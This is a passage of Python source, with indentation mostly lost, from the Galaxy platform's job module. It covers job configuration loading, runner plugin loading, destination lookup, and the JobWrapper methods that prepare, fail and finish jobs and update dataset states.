"""Loads the old-style job configuration from options in the galaxy config file (by default, config/galaxy.ini).
"""
log.debug('Loading job configuration from %s' % self.app.config.config_file)
# Always load local and lwr
self.runner_plugins = [dict(id='local', load='local', workers=self.app.config.local_job_queue_workers), dict(id='lwr', load='lwr', workers=self.app.config.cluster_job_queue_workers)]
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
for runner in self.app.config.start_job_runners:
self.runner_plugins.append(dict(id=runner, load=runner, workers=self.app.config.cluster_job_queue_workers))
# Set the handlers
for id in self.app.config.job_handlers:
self.handlers[id] = (id,)
self.handlers['default_job_handlers'] = self.app.config.default_job_handlers
self.default_handler_id = 'default_job_handlers'
# Set tool handler configs
for id, tool_handlers in self.app.config.tool_handlers.items():
self.tools[id] = list()
for handler_config in tool_handlers:
# rename the 'name' key to 'handler'
handler_config['handler'] = handler_config.pop('name')
self.tools[id].append(JobToolConfiguration(**handler_config))
# Set tool runner configs
for id, tool_runners in self.app.config.tool_runners.items():
# Might have been created in the handler parsing above
if id not in self.tools:
self.tools[id] = list()
for runner_config in tool_runners:
url = runner_config['url']
if url not in self.destinations:
# Create a new "legacy" JobDestination - it will have its URL converted to a destination params once the appropriate plugin has loaded
self.destinations[url] = (JobDestination(id=url, runner=url.split(':', 1)[0], url=url, legacy=True, converted=False),)
for tool_conf in self.tools[id]:
if tool_conf.params == runner_config.get('params', {}):
tool_conf['destination'] = url
break
else:
# There was not an existing config (from the handlers section) with the same params
# rename the 'url' key to 'destination'
runner_config['destination'] = runner_config.pop('url')
self.tools[id].append(JobToolConfiguration(**runner_config))
self.destinations[self.app.config.default_cluster_job_runner] = (JobDestination(id=self.app.config.default_cluster_job_runner, runner=self.app.config.default_cluster_job_runner.split(':', 1)[0], url=self.app.config.default_cluster_job_runner, legacy=True, converted=False),)
self.default_destination_id = self.app.config.default_cluster_job_runner
# Set the job limits
self.limits = Bunch(registered_user_concurrent_jobs=self.app.config.registered_user_job_limit,
anonymous_user_concurrent_jobs=self.app.config.anonymous_user_job_limit,
walltime=self.app.config.job_walltime,
walltime_delta=self.app.config.job_walltime_delta,
output_size=self.app.config.output_size_limit,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
log.debug('Done loading job configuration')
def get_tool_resource_parameters( self, tool_id ):
""" Given a tool id, return XML elements describing parameters to
insert into job resources.
        :param tool_id: A tool ID (a string)
:returns: List of parameter elements.
"""
fields = []
if not tool_id:
return fields
# TODO: Only works with exact matches, should handle different kinds of ids
# the way destination lookup does.
resource_group = None
if tool_id in self.tools:
resource_group = self.tools[ tool_id ][ 0 ].get_resource_group()
resource_group = resource_group or self.default_resource_group
if resource_group and resource_group in self.resource_groups:
fields_names = self.resource_groups[ resource_group ]
fields = [ self.resource_parameters[ n ] for n in fields_names ]
return fields
def __parse_resource_parameters( self ):
if not os.path.exists( self.app.config.job_resource_params_file ):
return
resource_param_file = self.app.config.job_resource_params_file
try:
resource_definitions = util.parse_xml( resource_param_file )
except Exception as e:
raise config_exception(e, resource_param_file)
resource_definitions_root = resource_definitions.getroot()
# TODO: Also handling conditionals would be awesome!
for parameter_elem in resource_definitions_root.findall( "param" ):
name = parameter_elem.get( "name" )
# Considered prepending __job_resource_param__ here and then
# stripping it off when making it available to dynamic job
# destination. Not needed because resource parameters are wrapped
# in a conditional.
## expanded_name = "__job_resource_param__%s" % name
## parameter_elem.set( "name", expanded_name )
self.resource_parameters[ name ] = parameter_elem
def __get_default(self, parent, names):
"""Returns the default attribute set in a parent tag like <handlers> or <destinations>, or return the ID of the child, if there is no explicit default and only one child.
:param parent: Object representing a tag that may or may not have a 'default' attribute.
:type parent: ``xml.etree.ElementTree.Element``
:param names: The list of destination or handler IDs or tags that were loaded.
:type names: list of str
:returns: str -- id or tag representing the default.
"""
rval = parent.get('default')
if rval is not None:
# If the parent element has a 'default' attribute, use the id or tag in that attribute
if rval not in names:
raise Exception("<%s> default attribute '%s' does not match a defined id or tag in a child element" % (parent.tag, rval))
log.debug("<%s> default set to child with id or tag '%s'" % (parent.tag, rval))
elif len(names) == 1:
log.info("Setting <%s> default to child with id '%s'" % (parent.tag, names[0]))
rval = names[0]
else:
raise Exception("No <%s> default specified, please specify a valid id or tag with the 'default' attribute" % parent.tag)
return rval
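    # For example (illustrative): given <destinations default="cluster">, __get_default()
    # returns 'cluster' provided a destination or tag with that name was loaded; with no
    # 'default' attribute and exactly one child defined, that child's id is returned.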
def __findall_with_required(self, parent, match, attribs=None):
"""Like ``xml.etree.ElementTree.Element.findall()``, except only returns children that have the specified attribs.
:param parent: Parent element in which to find.
:type parent: ``xml.etree.ElementTree.Element``
:param match: Name of child elements to find.
:type match: str
:param attribs: List of required attributes in children elements.
:type attribs: list of str
:returns: list of ``xml.etree.ElementTree.Element``
"""
rval = []
if attribs is None:
attribs = ('id',)
for elem in parent.findall(match):
for attrib in attribs:
if attrib not in elem.attrib:
log.warning("required '%s' attribute is missing from <%s> element" % (attrib, match))
break
else:
rval.append(elem)
return rval
def __get_params(self, parent):
"""Parses any child <param> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <param> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = {}
for param in parent.findall('param'):
rval[param.get('id')] = param.text
return rval
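    # Example (illustrative param name): <param id="nativeSpecification">-q all.q</param>
    # is returned as {'nativeSpecification': '-q all.q'}.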
def __get_envs(self, parent):
"""Parses any child <env> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <env> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for param in parent.findall('env'):
rval.append( dict(
name=param.get('id'),
file=param.get('file'),
execute=param.get('exec'),
value=param.text,
raw=util.asbool(param.get('raw', 'false'))
) )
return rval
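    # Example (illustrative): <env id="_JAVA_OPTIONS">-Xmx4G</env> becomes
    # {'name': '_JAVA_OPTIONS', 'file': None, 'execute': None, 'value': '-Xmx4G', 'raw': False}.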
def __get_resubmits(self, parent):
"""Parses any child <resubmit> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <resubmit> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for resubmit in parent.findall('resubmit'):
rval.append( dict(
condition=resubmit.get('condition'),
destination=resubmit.get('destination'),
handler=resubmit.get('handler')
) )
return rval
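    # Example (illustrative names): <resubmit condition="walltime_reached" destination="longjobs"/>
    # becomes {'condition': 'walltime_reached', 'destination': 'longjobs', 'handler': None}.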
@property
def default_job_tool_configuration(self):
"""The default JobToolConfiguration, used if a tool does not have an explicit defintion in the configuration. It consists of a reference to the default handler and default destination.
:returns: JobToolConfiguration -- a representation of a <tool> element that uses the default handler and destination
"""
return JobToolConfiguration(id='default', handler=self.default_handler_id, destination=self.default_destination_id)
# Called upon instantiation of a Tool object
def get_job_tool_configurations(self, ids):
"""Get all configured JobToolConfigurations for a tool ID, or, if given a list of IDs, the JobToolConfigurations for the first id in ``ids`` matching a tool definition.
.. note::
You should not mix tool shed tool IDs, versionless tool shed IDs, and tool config tool IDs that refer to the same tool.
:param ids: Tool ID or IDs to fetch the JobToolConfiguration of.
:type ids: list or str.
:returns: list -- JobToolConfiguration Bunches representing <tool> elements matching the specified ID(s).
Example tool ID strings include:
* Full tool shed id: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool/1.0.0``
* Tool shed id less version: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool``
* Tool config tool id: ``filter_tool``
"""
rval = []
# listify if ids is a single (string) id
ids = util.listify(ids)
for id in ids:
if id in self.tools:
# If a tool has definitions that include job params but not a
# definition for jobs without params, include the default
# config
for job_tool_configuration in self.tools[id]:
if not job_tool_configuration.params:
break
else:
rval.append(self.default_job_tool_configuration)
rval.extend(self.tools[id])
break
else:
rval.append(self.default_job_tool_configuration)
return rval
def __get_single_item(self, collection):
"""Given a collection of handlers or destinations, return one item from the collection at random.
"""
        # Done this way to avoid calling random.choice() when there is only one item, on the assumption that skipping it is faster
if len(collection) == 1:
return collection[0]
else:
return random.choice(collection)
# This is called by Tool.get_job_handler()
def get_handler(self, id_or_tag):
"""Given a handler ID or tag, return the provided ID or an ID matching the provided tag
:param id_or_tag: A handler ID or tag.
:type id_or_tag: str
:returns: str -- A valid job handler ID.
"""
if id_or_tag is None:
id_or_tag = self.default_handler_id
return self.__get_single_item(self.handlers[id_or_tag])
def get_destination(self, id_or_tag):
"""Given a destination ID or tag, return the JobDestination matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: JobDestination -- A valid destination
Destinations are deepcopied as they are expected to be passed in to job
runners, which will modify them for persisting params set at runtime.
"""
if id_or_tag is None:
id_or_tag = self.default_destination_id
return copy.deepcopy(self.__get_single_item(self.destinations[id_or_tag]))
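    # Illustrative usage (ids assumed): get_destination('cluster') returns a deep copy of
    # the destination registered under the id 'cluster'; if 'cluster' is a tag, one of the
    # tagged destinations is chosen at random via __get_single_item().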
def get_destinations(self, id_or_tag):
"""Given a destination ID or tag, return all JobDestinations matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: list or tuple of JobDestinations
Destinations are not deepcopied, so they should not be passed to
anything which might modify them.
"""
return self.destinations.get(id_or_tag, None)
def get_job_runner_plugins(self, handler_id):
"""Load all configured job runner plugins
:returns: list of job runner plugins
"""
rval = {}
if handler_id in self.handler_runner_plugins:
plugins_to_load = [ rp for rp in self.runner_plugins if rp['id'] in self.handler_runner_plugins[handler_id] ]
log.info( "Handler '%s' will load specified runner plugins: %s", handler_id, ', '.join( [ rp['id'] for rp in plugins_to_load ] ) )
else:
plugins_to_load = self.runner_plugins
log.info( "Handler '%s' will load all configured runner plugins", handler_id )
for runner in plugins_to_load:
class_names = []
module = None
id = runner['id']
load = runner['load']
if ':' in load:
# Name to load was specified as '<module>:<class>'
module_name, class_name = load.rsplit(':', 1)
class_names = [ class_name ]
module = __import__( module_name )
else:
# Name to load was specified as '<module>'
if '.' not in load:
# For legacy reasons, try from galaxy.jobs.runners first if there's no '.' in the name
module_name = 'galaxy.jobs.runners.' + load
try:
module = __import__( module_name )
except ImportError:
# No such module, we'll retry without prepending galaxy.jobs.runners.
# All other exceptions (e.g. something wrong with the module code) will raise
pass
if module is None:
# If the name included a '.' or loading from the static runners path failed, try the original name
module = __import__( load )
module_name = load
if module is None:
# Module couldn't be loaded, error should have already been displayed
continue
for comp in module_name.split( "." )[1:]:
module = getattr( module, comp )
if not class_names:
# If there's not a ':', we check <module>.__all__ for class names
try:
assert module.__all__
class_names = module.__all__
except AssertionError:
log.error( 'Runner "%s" does not contain a list of exported classes in __all__' % load )
continue
for class_name in class_names:
runner_class = getattr( module, class_name )
try:
assert issubclass(runner_class, BaseJobRunner)
except TypeError:
log.warning("A non-class name was found in __all__, ignoring: %s" % id)
continue
except AssertionError:
log.warning("Job runner classes must be subclassed from BaseJobRunner, %s has bases: %s" % (id, runner_class.__bases__))
continue
try:
rval[id] = runner_class( self.app, runner[ 'workers' ], **runner.get( 'kwds', {} ) )
except TypeError:
log.exception( "Job runner '%s:%s' has not been converted to a new-style runner or encountered TypeError on load" % ( module_name, class_name ) )
rval[id] = runner_class( self.app )
log.debug( "Loaded job runner '%s:%s' as '%s'" % ( module_name, class_name, id ) )
return rval
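    # Load strings accepted above, for illustration: 'galaxy.jobs.runners.local:LocalJobRunner'
    # (explicit '<module>:<class>'), or a bare name like 'local' which is first tried as
    # 'galaxy.jobs.runners.local' with classes taken from that module's __all__.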
def is_id(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == tuple
def is_tag(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == list
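    # Descriptive note: real ids are stored as 1-tuples and tags as lists in
    # self.handlers / self.destinations (see __parse_job_conf_xml above), which is
    # what makes the type checks in is_id() and is_tag() meaningful.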
def is_handler(self, server_name):
"""Given a server name, indicate whether the server is a job handler
:param server_name: The name to check
:type server_name: str
:return: bool
"""
for collection in self.handlers.values():
if server_name in collection:
return True
return False
def convert_legacy_destinations(self, job_runners):
"""Converts legacy (from a URL) destinations to contain the appropriate runner params defined in the URL.
:param job_runners: All loaded job runner plugins.
:type job_runners: list of job runner plugins
"""
for id, destination in [ ( id, destinations[0] ) for id, destinations in self.destinations.items() if self.is_id(destinations) ]:
# Only need to deal with real destinations, not members of tags
if destination.legacy and not destination.converted:
if destination.runner in job_runners:
destination.params = job_runners[destination.runner].url_to_destination(destination.url).params
destination.converted = True
if destination.params:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
for k, v in destination.params.items():
log.debug(" %s: %s" % (k, v))
else:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
else:
log.warning("Legacy destination with id '%s' could not be converted: Unknown runner plugin: %s" % (id, destination.runner))
class JobWrapper( object ):
"""
Wraps a 'model.Job' with convenience methods for running processes and
state management.
"""
def __init__( self, job, queue, use_persisted_destination=False ):
self.job_id = job.id
self.session_id = job.session_id
self.user_id = job.user_id
self.tool = queue.app.toolbox.get_tool( job.tool_id, job.tool_version, exact=True )
self.queue = queue
self.app = queue.app
self.sa_session = self.app.model.context
self.extra_filenames = []
self.command_line = None
# Tool versioning variables
self.write_version_cmd = None
self.version_string = ""
self.galaxy_lib_dir = None
# With job outputs in the working directory, we need the working
# directory to be set before prepare is run, or else premature deletion
# and job recovery fail.
# Create the working dir if necessary
try:
self.app.object_store.create(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
self.working_directory = self.app.object_store.get_filename(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
log.debug('(%s) Working directory for job is: %s' % (self.job_id, self.working_directory))
except ObjectInvalid:
raise Exception('Unable to create job working directory, job failure')
self.dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.output_paths = None
self.output_hdas_and_paths = None
self.tool_provided_job_metadata = None
# Wrapper holding the info required to restore and clean up from files used for setting metadata externally
self.external_output_metadata = metadata.JobExternalOutputMetadataWrapper( job )
self.job_runner_mapper = JobRunnerMapper( self, queue.dispatcher.url_to_destination, self.app.job_config )
self.params = None
if job.params:
self.params = loads( job.params )
if use_persisted_destination:
self.job_runner_mapper.cached_job_destination = JobDestination( from_job=job )
self.__user_system_pwent = None
self.__galaxy_system_pwent = None
def _job_dataset_path_rewriter( self, working_directory ):
if self.app.config.outputs_to_working_directory:
dataset_path_rewriter = OutputsToWorkingDirectoryPathRewriter( working_directory )
else:
dataset_path_rewriter = NullDatasetPathRewriter( )
return dataset_path_rewriter
def can_split( self ):
# Should the job handler split this job up?
return self.app.config.use_tasked_jobs and self.tool.parallelism
def get_job_runner_url( self ):
log.warning('(%s) Job runner URLs are deprecated, use destinations instead.' % self.job_id)
return self.job_destination.url
def get_parallelism(self):
return self.tool.parallelism
@property
def commands_in_new_shell(self):
return self.app.config.commands_in_new_shell
# legacy naming
get_job_runner = get_job_runner_url
@property
def job_destination(self):
"""Return the JobDestination that this job will use to run. This will
either be a configured destination, a randomly selected destination if
the configured destination was a tag, or a dynamically generated
destination from the dynamic runner.
Calling this method for the first time causes the dynamic runner to do
its calculation, if any.
:returns: ``JobDestination``
"""
return self.job_runner_mapper.get_job_destination(self.params)
def get_job( self ):
return self.sa_session.query( model.Job ).get( self.job_id )
def get_id_tag(self):
        # For compatibility with drmaa, which uses job_id right now, and TaskWrapper
return self.get_job().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.get_job()
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def get_version_string_path( self ):
return os.path.abspath(os.path.join(self.app.config.new_file_path, "GALAXY_VERSION_STRING_%s" % self.job_id))
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
self.sa_session.expunge_all() # this prevents the metadata reverting that has been seen in conjunction with the PBS job runner
if not os.path.exists( self.working_directory ):
os.mkdir( self.working_directory )
job = self._load_job()
def get_special( ):
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
if not special:
special = self.sa_session.query( model.GenomeIndexToolData ).filter_by( job=job ).first()
return special
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment, get_special=get_special )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
job.command_line = self.command_line
self.sa_session.add( job )
self.sa_session.flush()
# Return list of all extra files
self.param_dict = tool_evaluator.param_dict
version_string_cmd = self.tool.version_string_cmd
if version_string_cmd:
self.write_version_cmd = "%s > %s 2>&1" % ( version_string_cmd, compute_environment.version_path() )
else:
self.write_version_cmd = None
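        # Illustrative: for a tool whose version_string_cmd is "mytool --version",
        # write_version_cmd ends up as something like
        # "mytool --version > <new_file_path>/GALAXY_VERSION_STRING_<job_id> 2>&1"
        # (see get_version_string_path() above; the exact path comes from the
        # compute environment).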
return self.extra_filenames
def default_compute_environment( self, job=None ):
if not job:
job = self.get_job()
return SharedComputeEnvironment( self, job )
def _load_job( self ):
# Load job from database and verify it has user or session.
# Restore parameters from the database
job = self.get_job()
if job.user is None and job.galaxy_session is None:
raise Exception( 'Job %s has no user and no session.' % job.id )
return job
def _get_tool_evaluator( self, job ):
        # Hacky way to avoid circular import for now.
        # Placing ToolEvaluator in either jobs or tools
        # results in a circular dependency.
from galaxy.tools.evaluation import ToolEvaluator
tool_evaluator = ToolEvaluator(
app=self.app,
job=job,
tool=self.tool,
local_working_directory=self.working_directory,
)
return tool_evaluator
def fail( self, message, exception=False, stdout="", stderr="", exit_code=None ):
"""
Indicate job failure by setting state and message on all output
datasets.
"""
job = self.get_job()
self.sa_session.refresh( job )
# if the job was deleted, don't fail it
if not job.state == job.states.DELETED:
# Check if the failure is due to an exception
if exception:
# Save the traceback immediately in case we generate another
# below
job.traceback = traceback.format_exc()
# Get the exception and let the tool attempt to generate
# a better message
etype, evalue, tb = sys.exc_info()
m = self.tool.handle_job_failure_exception( evalue )
if m:
message = m
if self.app.config.outputs_to_working_directory:
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "fail(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
                    except ( IOError, OSError ) as e:
log.error( "fail(): Missing output file in working directory: %s" % e )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = dataset.states.ERROR
dataset.blurb = 'tool error'
dataset.info = message
dataset.set_size()
dataset.dataset.set_total_size()
dataset.mark_unhidden()
if dataset.ext == 'auto':
dataset.extension = 'data'
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
self.sa_session.add( dataset )
self.sa_session.flush()
job.set_final_state( job.states.ERROR )
job.command_line = self.command_line
job.info = message
# TODO: Put setting the stdout, stderr, and exit code in one place
# (not duplicated with the finish method).
if ( len( stdout ) > DATABASE_MAX_STRING_SIZE ):
stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = stdout
if ( len( stderr ) > DATABASE_MAX_STRING_SIZE ):
stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = stderr
# Let the exit code be Null if one is not provided:
            if exit_code is not None:
job.exit_code = exit_code
self.sa_session.add( job )
self.sa_session.flush()
#Perform email action even on failure.
for pja in [pjaa.post_job_action for pjaa in job.post_job_actions if pjaa.post_job_action.action_type == "EmailAction"]:
ActionBox.execute(self.app, self.sa_session, pja, job)
# If the job was deleted, call tool specific fail actions (used for e.g. external metadata) and clean up
if self.tool:
self.tool.job_failed( self, message, exception )
delete_files = self.app.config.cleanup_job == 'always' or (self.app.config.cleanup_job == 'onsuccess' and job.state == job.states.DELETED)
self.cleanup( delete_files=delete_files )
def pause( self, job=None, message=None ):
if job is None:
job = self.get_job()
if message is None:
message = "Execution of this dataset's job is paused"
if job.state == job.states.NEW:
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = dataset_assoc.dataset.dataset.states.PAUSED
dataset_assoc.dataset.info = message
self.sa_session.add( dataset_assoc.dataset )
job.set_state( job.states.PAUSED )
self.sa_session.add( job )
def mark_as_resubmitted( self ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset in [ dataset_assoc.dataset for dataset_assoc in job.output_datasets + job.output_library_datasets ]:
dataset._state = model.Dataset.states.RESUBMITTED
self.sa_session.add( dataset )
job.set_state( model.Job.states.RESUBMITTED )
self.sa_session.add( job )
self.sa_session.flush()
def change_state( self, state, info=False ):
job = self.get_job()
self.sa_session.refresh( job )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = state
if info:
dataset.info = info
self.sa_session.add( dataset )
self.sa_session.flush()
if info:
job.info = info
job.set_state( state )
self.sa_session.add( job )
self.sa_session.flush()
def get_state( self ):
job = self.get_job()
self.sa_session.refresh( job )
return job.state
def set_runner( self, runner_url, external_id ):
log.warning('set_runner() is deprecated, use set_job_destination()')
self.set_job_destination(self.job_destination, external_id)
def set_job_destination( self, job_destination, external_id=None ):
"""
Persist job destination params in the database for recovery.
self.job_destination is not used because a runner may choose to rewrite
parts of the destination (e.g. the params).
"""
job = self.get_job()
self.sa_session.refresh(job)
log.debug('(%s) Persisting job destination (destination id: %s)' % (job.id, job_destination.id))
job.destination_id = job_destination.id
job.destination_params = job_destination.params
job.job_runner_name = job_destination.runner
job.job_runner_external_id = external_id
self.sa_session.add(job)
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None, remote_working_directory=None ):
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# default post job setup
self.sa_session.expunge_all()
job = self.get_job()
# TODO: After failing here, consider returning from the function.
try:
self.reclaim_ownership()
except:
log.exception( '(%s) Failed to change ownership of %s, failing' % ( job.id, self.working_directory ) )
return self.fail( job.info, stdout=stdout, stderr=stderr, exit_code=tool_exit_code )
# if the job was deleted, don't finish it
if job.state == job.states.DELETED or job.state == job.states.ERROR:
# SM: Note that, at this point, the exit code must be saved in case
# there was an error. Errors caught here could mean that the job
# was deleted by an administrator (based on old comments), but it
# could also mean that a job was broken up into tasks and one of
# the tasks failed. So include the stderr, stdout, and exit code:
return self.fail( job.info, stderr=stderr, stdout=stdout, exit_code=tool_exit_code )
# Check the tool's stdout, stderr, and exit code for errors, but only
# if the job has not already been marked as having an error.
# The job's stdout and stderr will be set accordingly.
# We set final_job_state to use for dataset management, but *don't* set
# job.state until after dataset collection to prevent history issues
if ( self.check_tool_output( stdout, stderr, tool_exit_code, job ) ):
final_job_state = job.states.OK
else:
final_job_state = job.states.ERROR
if self.tool.version_string_cmd:
version_filename = self.get_version_string_path()
if os.path.exists(version_filename):
self.version_string = open(version_filename).read()
os.unlink(version_filename)
if self.app.config.outputs_to_working_directory and not self.__link_file_check():
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "finish(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ):
# this can happen if Galaxy is restarted during the job's
# finish method - the false_path file has already moved,
# and when the job is recovered, it won't be found.
if os.path.exists( dataset_path.real_path ) and os.stat( dataset_path.real_path ).st_size > 0:
log.warning( "finish(): %s not found, but %s is not empty, so it will be used instead" % ( dataset_path.false_path, dataset_path.real_path ) )
else:
# Prior to fail we need to set job.state
job.set_state( final_job_state )
return self.fail( "Job %s's output dataset(s) could not be read" % job.id )
job_context = ExpressionContext( dict( stdout=job.stdout, stderr=job.stderr ) )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
context = self.get_dataset_finish_context( job_context, dataset_assoc.dataset.dataset )
            # should this also be checking library associations? - can a library item be added from a history before the job has ended? - let's not allow this to occur
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations: # need to update all associated output hdas, i.e. history was shared with job running
trynum = 0
while trynum < self.app.config.retry_job_output_collection:
try:
# Attempt to short circuit NFS attribute caching
os.stat( dataset.dataset.file_name )
os.chown( dataset.dataset.file_name, os.getuid(), -1 )
trynum = self.app.config.retry_job_output_collection
                    except ( OSError, ObjectNotFound ) as e:
trynum += 1
log.warning( 'Error accessing %s, will retry: %s', dataset.dataset.file_name, e )
time.sleep( 2 )
if getattr( dataset, "hidden_beneath_collection_instance", None ):
dataset.visible = False
dataset.blurb = 'done'
dataset.peek = 'no peek'
dataset.info = (dataset.info or '')
if context['stdout'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stdout'].strip()
if context['stderr'].strip():
#Ensure white space between entries
dataset.info = dataset.info.rstrip() + "\n" + context['stderr'].strip()
dataset.tool_version = self.version_string
dataset.set_size()
if 'uuid' in context:
dataset.dataset.uuid = context['uuid']
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
if job.states.ERROR == final_job_state:
dataset.blurb = "error"
dataset.mark_unhidden()
elif dataset.has_data():
# If the tool was expected to set the extension, attempt to retrieve it
if dataset.ext == 'auto':
dataset.extension = context.get( 'ext', 'data' )
dataset.init_meta( copy_from=dataset )
#if a dataset was copied, it won't appear in our dictionary:
#either use the metadata from originating output dataset, or call set_meta on the copies
#it would be quicker to just copy the metadata from the originating output dataset,
#but somewhat trickier (need to recurse up the copied_from tree), for now we'll call set_meta()
if ( not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and self.app.config.retry_metadata_internally ):
dataset.datatype.set_meta( dataset, overwrite=False ) # call datatype.set_meta directly for the initial set_meta call during dataset creation
elif not self.external_output_metadata.external_metadata_set_successfully( dataset, self.sa_session ) and job.states.ERROR != final_job_state:
dataset._state = model.Dataset.states.FAILED_METADATA
else:
#load metadata from file
#we need to no longer allow metadata to be edited while the job is still running,
#since if it is edited, the metadata changed on the running output will no longer match
#the metadata that was stored to disk for use via the external process,
#and the changes made by the user will be lost, without warning or notice
output_filename = self.external_output_metadata.get_output_filenames_by_dataset( dataset, self.sa_session ).filename_out
def path_rewriter( path ):
if not remote_working_directory or not path:
return path
normalized_remote_working_directory = os.path.normpath( remote_working_directory )
normalized_path = os.path.normpath( path )
if normalized_path.startswith( normalized_remote_working_directory ):
return normalized_path.replace( normalized_remote_working_directory, self.working_directory, 1 )
return path
dataset.metadata.from_JSON_dict( output_filename, path_rewriter=path_rewriter )
try:
assert context.get( 'line_count', None ) is not None
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( line_count=context['line_count'], is_multi_byte=True )
else:
dataset.set_peek( line_count=context['line_count'] )
except:
if ( not dataset.datatype.composite_type and dataset.dataset.is_multi_byte() ) or self.tool.is_multi_byte:
dataset.set_peek( is_multi_byte=True )
else:
dataset.set_peek()
try:
# set the name if provided by the tool
dataset.name = context['name']
except:
pass
else:
dataset.blurb = "empty"
if dataset.ext == 'auto':
dataset.extension = 'txt'
self.sa_session.add( dataset )
if job.states.ERROR == final_job_state:
log.debug( "setting dataset state to ERROR" )
# TODO: This is where the state is being set to error. Change it!
dataset_assoc.dataset.dataset.state = model.Dataset.states.ERROR
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset_assoc.dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
else:
dataset_assoc.dataset.dataset.state = model.Dataset.states.OK
# If any of the rest of the finish method below raises an
# exception, the fail method will run and set the datasets to
# ERROR. The user will never see that the datasets are in error if
# they were flushed as OK here, since upon doing so, the history
# panel stops checking for updates. So allow the
# self.sa_session.flush() at the bottom of this method set
# the state instead.
for pja in job.post_job_actions:
ActionBox.execute(self.app, self.sa_session, pja.post_job_action, job)
# Flush all the dataset and job changes above. Dataset state changes
# will now be seen by the user.
self.sa_session.flush()
# Save stdout and stderr
if len( job.stdout ) > DATABASE_MAX_STRING_SIZE:
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = util.shrink_string_by_size( job.stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( job.stderr ) > DATABASE_MAX_STRING_SIZE:
